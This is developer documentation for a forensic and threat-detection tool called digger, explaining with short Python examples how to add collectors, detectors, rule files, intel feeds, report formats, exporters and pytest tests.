Extending digger
Write a new collector, detector, framework, or intel feed.
A new collector
Subclass Collector, set the class-level metadata fields shown in the
example (name, category, supported_os, requires_admin, description), yield
artifacts from collect(), and register the class.
--- digger/collectors/macos/my_collector.py ---
from pathlib import Path
from typing import Iterable

from digger.core.collector import Collector
from digger.core.evidence import Artifact
from digger.core.platform import OS


class SafariWebsiteDataCollector(Collector):
    name = "macos.safari_website_data"
    category = "browser"
    supported_os = (OS.MACOS,)
    requires_admin = False
    description = "Safari WebKit website data plist."

    def collect(self) -> Iterable[Artifact]:
        p = Path.home() / "Library/Safari/WebsiteData.plist"
        if not p.exists():
            return
        try:
            data = p.read_bytes()
        except (PermissionError, OSError):
            return
        yield self.make(
            subject=str(p),
            path=str(p),
            size=len(data),
        )
Register in digger/collectors/__init__.py in the appropriate
OS-specific list:
def _macos() -> list[Collector]:
    ...
    from digger.collectors.macos.my_collector import SafariWebsiteDataCollector
    return [
        ...,
        SafariWebsiteDataCollector(),
    ]
Graceful degradation. A collector that can't read what it needs should yield nothing and return; it should never raise. Wrap risky calls in try/except (PermissionError, OSError, subprocess.SubprocessError). Check shutil.which() before shelling out.
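The guard described above can be sketched as a small helper. This is a minimal illustration using only the standard library; run_tool and its timeout default are hypothetical names, not part of digger.

```python
import shutil
import subprocess
from typing import Optional, Sequence


def run_tool(argv: Sequence[str], timeout: float = 10.0) -> Optional[str]:
    """Run an external tool and return its stdout, or None if it is unusable.

    Hypothetical helper for illustration; not part of digger.
    """
    # Skip quietly when the binary is not installed on this host.
    if shutil.which(argv[0]) is None:
        return None
    try:
        proc = subprocess.run(
            list(argv),
            capture_output=True,
            text=True,
            errors="replace",  # never fail on undecodable output
            timeout=timeout,
            check=True,  # non-zero exit raises CalledProcessError
        )
    except (PermissionError, OSError, subprocess.SubprocessError):
        # Non-zero exit, timeout, or an unrunnable binary: degrade, don't raise.
        return None
    return proc.stdout
```

Inside collect(), a collector would simply return when this helper gives back None, so a missing or failing tool produces no artifacts instead of an exception.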
A new detector
--- digger/detectors/my_detector.py ---
from typing import Iterable

from digger.core.evidence import EvidenceStore, Finding
from digger.detectors.base import Detector


class CrontabCommentDetector(Detector):
    name = "crontab_comment_anomaly"
    description = "Crontab entries with unusual commenting patterns."

    def detect(self, store: EvidenceStore) -> Iterable[Finding]:
        for art in store.iter_artifacts(collector="linux.cron"):
            contents = art["data"].get("contents") or ""
            if "###" in contents or "@@" in contents:
                yield Finding(
                    detector=self.name,
                    severity="low",
                    title=f"Unusual comment style in {art['subject']}",
                    summary="Crontab uses comment markers (###/@@) atypical for the system.",
                    artifact_refs=[art["artifact_uuid"]],
                    evidence={"path": art["data"].get("path")},
                    mitre="T1053.003",
                )
Register in digger/detectors/__init__.py:all_detectors(). Order
mostly doesn't matter, but keep TimelineBuilder last.
Data-driven detector
If your detector logic is "match a list of patterns/signatures," put the
patterns in YAML under digger/rules/<topic>/<file>.yaml
and load them via the shared helpers:
from digger.detectors._rules_io import load_yaml, load_intel
rules = load_yaml("my_topic/my_rules.yaml") # bundled file
live = load_intel("my_feed_name") # live intel cache (None if empty)
This pattern is used by shai_hulud, supply_chain,
c2, and threat_actor. It keeps the rule data
auditable and updatable without touching code.
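As a rough illustration of the data-driven shape, the sketch below matches text against a list of patterns. The rule schema (id, pattern, severity) and the match_rules helper are assumptions made for this example; the schema that digger's bundled rule files actually use is not shown on this page. The RULES dict stands in for what load_yaml() would return.

```python
import re
from typing import Any, Dict, Iterator

# Stand-in for the parsed contents of a rules file (hypothetical schema).
RULES: Dict[str, Any] = {
    "rules": [
        {"id": "curl-pipe-shell", "pattern": r"curl\s+[^|]*\|\s*(ba)?sh", "severity": "high"},
        {"id": "base64-decode", "pattern": r"base64\s+(-d|--decode)", "severity": "medium"},
    ]
}


def match_rules(text: str, rules: Dict[str, Any]) -> Iterator[Dict[str, str]]:
    """Yield one hit per rule whose regex matches anywhere in text."""
    for rule in rules.get("rules", []):
        if re.search(rule["pattern"], text):
            yield {"rule_id": rule["id"], "severity": rule["severity"]}


# Example: a crontab line that pipes a download into a shell.
hits = list(match_rules("*/5 * * * * curl http://x.example/a.sh | sh", RULES))
```

A detector's detect() would run a loop like this over each artifact's text and turn every hit into a Finding, so adding a signature means editing data rather than code.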
A new intel feed
Add an entry to the FEEDS list in
digger/intel/feeds.py:
FEEDS.append(Feed(
    name="my_corp_blocklist",
    url="https://intel.corp.example/blocklist.txt",
    interval=3600,                                # poll hourly
    parser=parse_lines,                           # uses bundled helper
    description="Internal IP blocklist maintained by corp SOC.",
    headers={"Authorization": "Bearer XXXXX"},    # if needed
))
Parsers receive raw bytes and return a JSON-serializable dict. Existing parsers cover JSON, CSV, Spamhaus-DROP-style, and one-per-line text; write your own if needed.
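If none of the bundled parsers fit, a custom one can be quite small. The sketch below assumes only the contract stated above (bytes in, JSON-serializable dict out) and returns its values under an entries key, matching what the detector snippet on this page reads. The function name parse_commented_lines and its comment-stripping rules are hypothetical.

```python
import json
from typing import Dict, List


def parse_commented_lines(raw: bytes) -> Dict[str, List[str]]:
    """Parse one-entry-per-line text, ignoring blanks and '#' or ';' comments."""
    entries: List[str] = []
    for line in raw.decode("utf-8", errors="replace").splitlines():
        # Drop trailing comments, then surrounding whitespace.
        for marker in ("#", ";"):
            line = line.split(marker, 1)[0]
        line = line.strip()
        if line:
            entries.append(line)
    return {"entries": entries}


sample = b"# corp blocklist\n203.0.113.7\n198.51.100.0/24 ; SBL123\n\n"
parsed = parse_commented_lines(sample)
json.dumps(parsed)  # would raise TypeError if the result were not JSON-serializable
```

Decoding with errors="replace" keeps a single bad byte in the feed from discarding the whole download.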
Detectors load the cache by name:
from digger.detectors._rules_io import load_intel
bl = load_intel("my_corp_blocklist") or {}
bad_ips = set(bl.get("entries", []))
for art in store.iter_artifacts(collector="network"):
    raddr = art["data"].get("raddr")
    if raddr and raddr[0] in bad_ips:
        yield Finding(...)
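Exact set membership only catches addresses listed verbatim. If a feed also carries CIDR ranges (an assumption; your feed's format may differ), the standard-library ipaddress module can handle both forms. build_matcher below is a hypothetical helper, not part of digger.

```python
import ipaddress
from typing import Callable, Iterable


def build_matcher(entries: Iterable[str]) -> Callable[[str], bool]:
    """Return a predicate that tests an IP string against addresses and CIDR ranges."""
    networks = []
    for entry in entries:
        try:
            # A bare address becomes a /32 (or /128) network;
            # strict=False tolerates host bits, e.g. "10.0.0.5/8".
            networks.append(ipaddress.ip_network(entry, strict=False))
        except ValueError:
            continue  # skip malformed entries rather than failing the detector

    def is_listed(ip: str) -> bool:
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            return False
        # Linear scan: fine for small lists, slow for very large ones.
        return any(addr in net for net in networks)

    return is_listed


is_bad = build_matcher(["203.0.113.7", "198.51.100.0/24", "not-an-ip"])
```

In the loop above, the membership test would then become is_bad(raddr[0]) in place of raddr[0] in bad_ips.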
A new compliance framework
Drop a YAML file under digger/compliance/frameworks/. See the
Compliance page for the predicate vocabulary
and an example. No code change required — digger compliance list
discovers it automatically.
A new report format
Reports are pure functions: render_X(store: EvidenceStore) -> str.
Drop a module under digger/report/, expose render_…,
wire it into digger/report/__init__.py and into
cli.py:cmd_report's renderers dict.
A new exporter
Same pattern: pure function over the evidence store under
digger/exchange/, plus a CLI sub-command in
cli.py. Use digger/tradecraft/tlp.py's
apply_tlp_filter() to respect sharing markings.
Tests
Drop tests under tests/ (filename test_*.py).
The harness is plain pytest; no custom fixtures or plugins are required (tmp_path is built in). For collector
and detector tests, build a temporary EvidenceStore on a
tmp_path, seed it with synthetic artifacts, and assert on the
emitted findings.
def test_my_detector_catches_x(tmp_path):
    from digger.core import Artifact, EvidenceStore
    # MyDetector is a placeholder: import the detector under test here.
    store = EvidenceStore(tmp_path)
    store.add_artifact(Artifact(collector="processes", category="process",
                                subject="pid=1", data={"name": "evil"}))
    n = MyDetector().run(store)
    assert n >= 1
    assert any("evil" in f["title"] for f in store.iter_findings())
    store.close()
Run with:
python -m pytest tests/test_my_module.py